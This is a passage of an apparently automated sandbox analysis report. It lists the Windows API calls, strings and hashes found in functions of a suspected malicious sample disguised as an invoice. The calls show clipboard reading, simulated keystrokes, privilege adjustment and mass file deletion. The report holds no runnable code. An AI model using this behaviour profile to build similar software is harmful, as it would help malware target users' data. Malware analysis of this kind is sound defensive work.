                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: __getptd_noexit__lock_file
                                                              • String ID:
                                                              • API String ID: 2597487223-0
                                                              • Opcode ID: b9e1a44e1e9212d74940298f68c15831f4336a7e71fcd11ab746f4a0af884a1d
                                                              • Instruction ID: 8da29b67c808b32c0b2e52551e44f1070710121534f0e5a8ef75fd26630c3ef5
                                                              • Opcode Fuzzy Hash: b9e1a44e1e9212d74940298f68c15831f4336a7e71fcd11ab746f4a0af884a1d
                                                              • Instruction Fuzzy Hash: 81F0C231520205EBDF25AF748C067DF3AE5BF20314F244415B4149A191C7788AF6DF51
                                                              APIs
                                                              • FreeLibrary.KERNEL32(?,?,?,?,?,001F39FE,?,00000001), ref: 001F4286
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: FreeLibrary
                                                              • String ID:
                                                              • API String ID: 3664257935-0
                                                              • Opcode ID: ba6ba945af476a3d03ee1c27939a6301cdad0da501bad5f92c4d9a04cacce3dc
                                                              • Instruction ID: 02fe61c6a97c27ad4018f16ea0c82540acb9181bc185fe572e5ec10f62f7047d
                                                              • Opcode Fuzzy Hash: ba6ba945af476a3d03ee1c27939a6301cdad0da501bad5f92c4d9a04cacce3dc
                                                              • Instruction Fuzzy Hash: 8FF015B1505706DFCB38DF64E894827BBE5BF143253258A3EF2DA82610C7329880DF50
                                                              APIs
                                                              • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 001F40C6
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: LongNamePath
                                                              • String ID:
                                                              • API String ID: 82841172-0
                                                              • Opcode ID: 12c5f28853d0bc651b961d332ba73faab6f2967958e8570dc1dffdcdca62115e
                                                              • Instruction ID: a9d30f48c917f95b6b2a11d7e859eefda67f7ef631a29fb083a588394111e56b
                                                              • Opcode Fuzzy Hash: 12c5f28853d0bc651b961d332ba73faab6f2967958e8570dc1dffdcdca62115e
                                                              • Instruction Fuzzy Hash: 58E0C2766002285BC711A658DC46FFA77ADDFC86A0F0A00B5FA0DE7244DA74ADC18A90
                                                              APIs
                                                              • Sleep.KERNELBASE(000001F4), ref: 00E26DF9
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2166684470.0000000000E24000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E24000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_e24000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Sleep
                                                              • String ID:
                                                              • API String ID: 3472027048-0
                                                              • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                              • Instruction ID: bebc2f1724eba3a13f96a525f4a2b3e11d09e3e9f8de45f2569647564fd2728c
                                                              • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                              • Instruction Fuzzy Hash: 4CE0E67494010DDFDB00DFB4D54969E7BB4EF04301F1002A5FD01E2280D6309E609A72
                                                              APIs
                                                                • Part of subcall function 0020B34E: GetWindowLongW.USER32(?,000000EB), ref: 0020B35F
                                                              • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 0025F87D
                                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0025F8DC
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0025F919
                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0025F940
                                                              • SendMessageW.USER32 ref: 0025F966
                                                              • _wcsncpy.LIBCMT ref: 0025F9D2
                                                              • GetKeyState.USER32(00000011), ref: 0025F9F3
                                                              • GetKeyState.USER32(00000009), ref: 0025FA00
                                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0025FA16
                                                              • GetKeyState.USER32(00000010), ref: 0025FA20
                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0025FA4F
                                                              • SendMessageW.USER32 ref: 0025FA72
                                                              • SendMessageW.USER32(?,00001030,?,0025E059), ref: 0025FB6F
                                                              • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 0025FB85
                                                              • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0025FB96
                                                              • SetCapture.USER32(?), ref: 0025FB9F
                                                              • ClientToScreen.USER32(?,?), ref: 0025FC03
                                                              • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0025FC0F
                                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 0025FC29
                                                              • ReleaseCapture.USER32 ref: 0025FC34
                                                              • GetCursorPos.USER32(?), ref: 0025FC69
                                                              • ScreenToClient.USER32(?,?), ref: 0025FC76
                                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 0025FCD8
                                                              • SendMessageW.USER32 ref: 0025FD02
                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 0025FD41
                                                              • SendMessageW.USER32 ref: 0025FD6C
                                                              • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0025FD84
                                                              • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0025FD8F
                                                              • GetCursorPos.USER32(?), ref: 0025FDB0
                                                              • ScreenToClient.USER32(?,?), ref: 0025FDBD
                                                              • GetParent.USER32(?), ref: 0025FDD9
                                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 0025FE3F
                                                              • SendMessageW.USER32 ref: 0025FE6F
                                                              • ClientToScreen.USER32(?,?), ref: 0025FEC5
                                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0025FEF1
                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 0025FF19
                                                              • SendMessageW.USER32 ref: 0025FF3C
                                                              • ClientToScreen.USER32(?,?), ref: 0025FF86
                                                              • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0025FFB6
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0026004B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                              • String ID: @GUI_DRAGID$F
                                                              • API String ID: 2516578528-4164748364
                                                              • Opcode ID: 8685a7b925c19488d06d3d2125a4381e1134d49f06128bd6a2feeff90fe22b75
                                                              • Instruction ID: b5c635c2f0099dd75c57d78913462175f2c67481237c3730c4ee8182508959ce
                                                              • Opcode Fuzzy Hash: 8685a7b925c19488d06d3d2125a4381e1134d49f06128bd6a2feeff90fe22b75
                                                              • Instruction Fuzzy Hash: AE32F070614346EFDB10CF24C988BAABBB8FF48354F140629FA99872A1D771DC68CB55
                                                              APIs
                                                              • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0025B1CD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID: %d/%02d/%02d
                                                              • API String ID: 3850602802-328681919
                                                              • Opcode ID: a355d69f399beab0d77fd6d6bdcce43e19a7717326644e259db8f602447636d8
                                                              • Instruction ID: 4c8d1334cf6493a5f5bcf7675ae5fd126c9c8318f25599101356eae0a1364236
                                                              • Opcode Fuzzy Hash: a355d69f399beab0d77fd6d6bdcce43e19a7717326644e259db8f602447636d8
                                                              • Instruction Fuzzy Hash: 8112FE7052020AAFEB259F24DC4AFAE7BB8FF44311F108219FD19AB2D1DBB08955CB55
                                                              APIs
                                                              • GetForegroundWindow.USER32(00000000,00000000), ref: 0020EB4A
                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00263AEA
                                                              • IsIconic.USER32(000000FF), ref: 00263AF3
                                                              • ShowWindow.USER32(000000FF,00000009), ref: 00263B00
                                                              • SetForegroundWindow.USER32(000000FF), ref: 00263B0A
                                                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00263B20
                                                              • GetCurrentThreadId.KERNEL32 ref: 00263B27
                                                              • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00263B33
                                                              • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00263B44
                                                              • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00263B4C
                                                              • AttachThreadInput.USER32(00000000,?,00000001), ref: 00263B54
                                                              • SetForegroundWindow.USER32(000000FF), ref: 00263B57
                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00263B6C
                                                              • keybd_event.USER32(00000012,00000000), ref: 00263B77
                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00263B81
                                                              • keybd_event.USER32(00000012,00000000), ref: 00263B86
                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00263B8F
                                                              • keybd_event.USER32(00000012,00000000), ref: 00263B94
                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00263B9E
                                                              • keybd_event.USER32(00000012,00000000), ref: 00263BA3
                                                              • SetForegroundWindow.USER32(000000FF), ref: 00263BA6
                                                              • AttachThreadInput.USER32(000000FF,?,00000000), ref: 00263BCD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                              • String ID: Shell_TrayWnd
                                                              • API String ID: 4125248594-2988720461
                                                              • Opcode ID: e9b9038596291c92efde3d30ab7dbd073a8c4c6ed8446b89a2696e5e276812be
                                                              • Instruction ID: 01b9da0b3539b5755c0a4ff43bdb2d9353d74f1efba3ad89204f658767bdad80
                                                              • Opcode Fuzzy Hash: e9b9038596291c92efde3d30ab7dbd073a8c4c6ed8446b89a2696e5e276812be
                                                              • Instruction Fuzzy Hash: 7F319471A50318BBEB206FA5AC4DF7F7E7CEF44B54F104015FA09EA1D0DAB15D90AAA0
                                                              APIs
                                                                • Part of subcall function 0022B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0022B180
                                                                • Part of subcall function 0022B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0022B1AD
                                                                • Part of subcall function 0022B134: GetLastError.KERNEL32 ref: 0022B1BA
                                                              • _memset.LIBCMT ref: 0022AD08
                                                              • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 0022AD5A
                                                              • CloseHandle.KERNEL32(?), ref: 0022AD6B
                                                              • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 0022AD82
                                                              • GetProcessWindowStation.USER32 ref: 0022AD9B
                                                              • SetProcessWindowStation.USER32(00000000), ref: 0022ADA5
                                                              • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0022ADBF
                                                                • Part of subcall function 0022AB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0022ACC0), ref: 0022AB99
                                                                • Part of subcall function 0022AB84: CloseHandle.KERNEL32(?,?,0022ACC0), ref: 0022ABAB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                              • String ID: $H**$default$winsta0
                                                              • API String ID: 2063423040-1330500095
                                                              • Opcode ID: 42f6e81cbe0ff48a2d107ff0cae415391ee8223ed804f9da5a6135bc4ecf925e
                                                              • Instruction ID: 8c719c6448f5330055e11c4e23d9c5aeb2f34e93455fbb6dae73dbb72d79a247
                                                              • Opcode Fuzzy Hash: 42f6e81cbe0ff48a2d107ff0cae415391ee8223ed804f9da5a6135bc4ecf925e
                                                              • Instruction Fuzzy Hash: 0F819F7181021ABFDF119FE4EC49AEEBB78EF04304F044129F814A6561DB758E65DF61
                                                              APIs
                                                                • Part of subcall function 00236EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00235FA6,?), ref: 00236ED8
                                                                • Part of subcall function 00236EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00235FA6,?), ref: 00236EF1
                                                                • Part of subcall function 0023725E: __wsplitpath.LIBCMT ref: 0023727B
                                                                • Part of subcall function 0023725E: __wsplitpath.LIBCMT ref: 0023728E
                                                                • Part of subcall function 002372CB: GetFileAttributesW.KERNEL32(?,00236019), ref: 002372CC
                                                              • _wcscat.LIBCMT ref: 00236149
                                                              • _wcscat.LIBCMT ref: 00236167
                                                              • __wsplitpath.LIBCMT ref: 0023618E
                                                              • FindFirstFileW.KERNEL32(?,?), ref: 002361A4
                                                              • _wcscpy.LIBCMT ref: 00236209
                                                              • _wcscat.LIBCMT ref: 0023621C
                                                              • _wcscat.LIBCMT ref: 0023622F
                                                              • lstrcmpiW.KERNEL32(?,?), ref: 0023625D
                                                              • DeleteFileW.KERNEL32(?), ref: 0023626E
                                                              • MoveFileW.KERNEL32(?,?), ref: 00236289
                                                              • MoveFileW.KERNEL32(?,?), ref: 00236298
                                                              • CopyFileW.KERNEL32(?,?,00000000), ref: 002362AD
                                                              • DeleteFileW.KERNEL32(?), ref: 002362BE
                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 002362E1
                                                              • FindClose.KERNEL32(00000000), ref: 002362FD
                                                              • FindClose.KERNEL32(00000000), ref: 0023630B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
                                                              • String ID: \*.*$p1#v`K$v
                                                              • API String ID: 1917200108-1732502266
                                                              • Opcode ID: 73e01fd73497e1907361ff1923b04a684bd03752897131181dd211d119596ba2
                                                              • Instruction ID: e1aab99735e2d852b1af228fa2b7d216270723b1f0592795062cd00f073581ad
                                                              • Opcode Fuzzy Hash: 73e01fd73497e1907361ff1923b04a684bd03752897131181dd211d119596ba2
                                                              • Instruction Fuzzy Hash: 3A5140B281811D6ACB21EB91DC48DEFB7FCAF15300F0541E6E589E3101DE7697998FA4
                                                              APIs
                                                              • OpenClipboard.USER32(0028DC00), ref: 00246B36
                                                              • IsClipboardFormatAvailable.USER32(0000000D), ref: 00246B44
                                                              • GetClipboardData.USER32(0000000D), ref: 00246B4C
                                                              • CloseClipboard.USER32 ref: 00246B58
                                                              • GlobalLock.KERNEL32(00000000), ref: 00246B74
                                                              • CloseClipboard.USER32 ref: 00246B7E
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00246B93
                                                              • IsClipboardFormatAvailable.USER32(00000001), ref: 00246BA0
                                                              • GetClipboardData.USER32(00000001), ref: 00246BA8
                                                              • GlobalLock.KERNEL32(00000000), ref: 00246BB5
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00246BE9
                                                              • CloseClipboard.USER32 ref: 00246CF6
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                              • String ID:
                                                              • API String ID: 3222323430-0
                                                              • Opcode ID: c289147291d68441c495c76d601669464b514b9877a7a501a9ca26274f5c9d71
                                                              • Instruction ID: 3073f7dedec14a67db2ae2d3366d097f47cbaee168e1905ac6fea9a6f835e6b5
                                                              • Opcode Fuzzy Hash: c289147291d68441c495c76d601669464b514b9877a7a501a9ca26274f5c9d71
                                                              • Instruction Fuzzy Hash: 7F51AF71210206ABD304EF60ED9EF7E77B8EF55B11F10052AFA4AE61E1DF70D8458A62
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(?,?), ref: 0023F62B
                                                              • FindClose.KERNEL32(00000000), ref: 0023F67F
                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0023F6A4
                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0023F6BB
                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0023F6E2
                                                              • __swprintf.LIBCMT ref: 0023F72E
                                                              • __swprintf.LIBCMT ref: 0023F767
                                                              • __swprintf.LIBCMT ref: 0023F7BB
                                                                • Part of subcall function 0021172B: __woutput_l.LIBCMT ref: 00211784
                                                              • __swprintf.LIBCMT ref: 0023F809
                                                              • __swprintf.LIBCMT ref: 0023F858
                                                              • __swprintf.LIBCMT ref: 0023F8A7
                                                              • __swprintf.LIBCMT ref: 0023F8F6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
                                                              • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                              • API String ID: 835046349-2428617273
                                                              • Opcode ID: daa2f998d2c2e1fef76f27058a029c62a417284b28f4df12be5ec07cf26eef6f
                                                              • Instruction ID: f25a563568714917222c02294682ae8b4be7b844912b46b916bb51e64edc6d08
                                                              • Opcode Fuzzy Hash: daa2f998d2c2e1fef76f27058a029c62a417284b28f4df12be5ec07cf26eef6f
                                                              • Instruction Fuzzy Hash: 23A111B1418344ABC354EF94C986DBFB7ECAF94704F44082EF695C2192EB34D959CB62
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00241B50
                                                              • _wcscmp.LIBCMT ref: 00241B65
                                                              • _wcscmp.LIBCMT ref: 00241B7C
                                                              • GetFileAttributesW.KERNEL32(?), ref: 00241B8E
                                                              • SetFileAttributesW.KERNEL32(?,?), ref: 00241BA8
                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00241BC0
                                                              • FindClose.KERNEL32(00000000), ref: 00241BCB
                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 00241BE7
                                                              • _wcscmp.LIBCMT ref: 00241C0E
                                                              • _wcscmp.LIBCMT ref: 00241C25
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00241C37
                                                              • SetCurrentDirectoryW.KERNEL32(002A39FC), ref: 00241C55
                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00241C5F
                                                              • FindClose.KERNEL32(00000000), ref: 00241C6C
                                                              • FindClose.KERNEL32(00000000), ref: 00241C7C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                              • String ID: *.*
                                                              • API String ID: 1803514871-438819550
                                                              • Opcode ID: 512ad339562f658a802ddb639a97edb90e270e8e0a829746df2518d1453168f3
                                                              • Instruction ID: ca9797c58facdfc2fe0c870b646b05a3eadec505126cf7687eb26f81880b7fd8
                                                              • Opcode Fuzzy Hash: 512ad339562f658a802ddb639a97edb90e270e8e0a829746df2518d1453168f3
                                                              • Instruction Fuzzy Hash: 9431C33255121A6BCB18AFB0EC89ADE77AC9F06324F500156F915E2091EB70DAF58A64
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00241CAB
                                                              • _wcscmp.LIBCMT ref: 00241CC0
                                                              • _wcscmp.LIBCMT ref: 00241CD7
                                                                • Part of subcall function 00236BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00236BEF
                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00241D06
                                                              • FindClose.KERNEL32(00000000), ref: 00241D11
                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 00241D2D
                                                              • _wcscmp.LIBCMT ref: 00241D54
                                                              • _wcscmp.LIBCMT ref: 00241D6B
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00241D7D
                                                              • SetCurrentDirectoryW.KERNEL32(002A39FC), ref: 00241D9B
                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00241DA5
                                                              • FindClose.KERNEL32(00000000), ref: 00241DB2
                                                              • FindClose.KERNEL32(00000000), ref: 00241DC2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                              • String ID: *.*
                                                              • API String ID: 1824444939-438819550
                                                              • Opcode ID: 16fb477a5a2e5a0b26be68c982ab0ee30ee9f0c04c17d15798e5407fcaf6be79
                                                              • Instruction ID: a8acca983d8487fe27a8ebd25b8507f1a7d4016ef91bc29734db1d9103129403
                                                              • Opcode Fuzzy Hash: 16fb477a5a2e5a0b26be68c982ab0ee30ee9f0c04c17d15798e5407fcaf6be79
                                                              • Instruction Fuzzy Hash: 1631E37291161ABBCF18AFA0EC49ADE77AD9F06320F100552E905A2091DB70DAF58E60
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
